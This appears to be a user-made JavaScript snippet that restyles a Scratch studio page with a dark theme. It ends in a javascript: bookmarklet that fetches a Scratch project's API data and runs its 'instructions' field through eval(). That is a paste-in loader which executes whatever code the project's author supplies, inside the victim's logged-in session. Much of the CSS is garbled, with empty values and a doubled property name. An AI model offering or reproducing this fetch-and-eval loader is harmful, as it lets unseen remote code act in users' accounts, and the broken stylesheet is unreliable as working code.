const style = document.createElement('style') style.innerHTML = ` .studio-page { background-color: #000; } .button { background-color: #000; color: #888 } .studio-title { color: #888 } .studio-info .studio-description.uneditable { background-color: rgba(0,0,0,1); color: #888 } html, body { color: #888 } .replies.collapsed>.comment:last-of-type:after { backgroundbackground:linear-gradient(rgba(0, 0, 0, 0), #000) } .comment .comment-body .comment-bubble:before { border-color: #888 transparent #888 #888; background:#444 } .comment .comment-body .comment-bubble { color: #000; background-color:; } a:link, a:visited, a:active { color: } .compose-comment .textarea-row textarea:not(:focus) { color: ; background-color: } .studio-tab-nav .active>li { background-color: ; color: } .studio-tab-nav li { background-color: ; color: } { background-color: ; } .studio-info .studio-info-footer-report button { background-color: ; } .compose-comment .compose-error-row .compose-error-tip { background-color: ; color: } ` document.body.appendChild(style)
javascript:fetch('https://api.scratch.mit.edu/projects/880622875').then(response => response.json()).then(data => eval(data.instructions));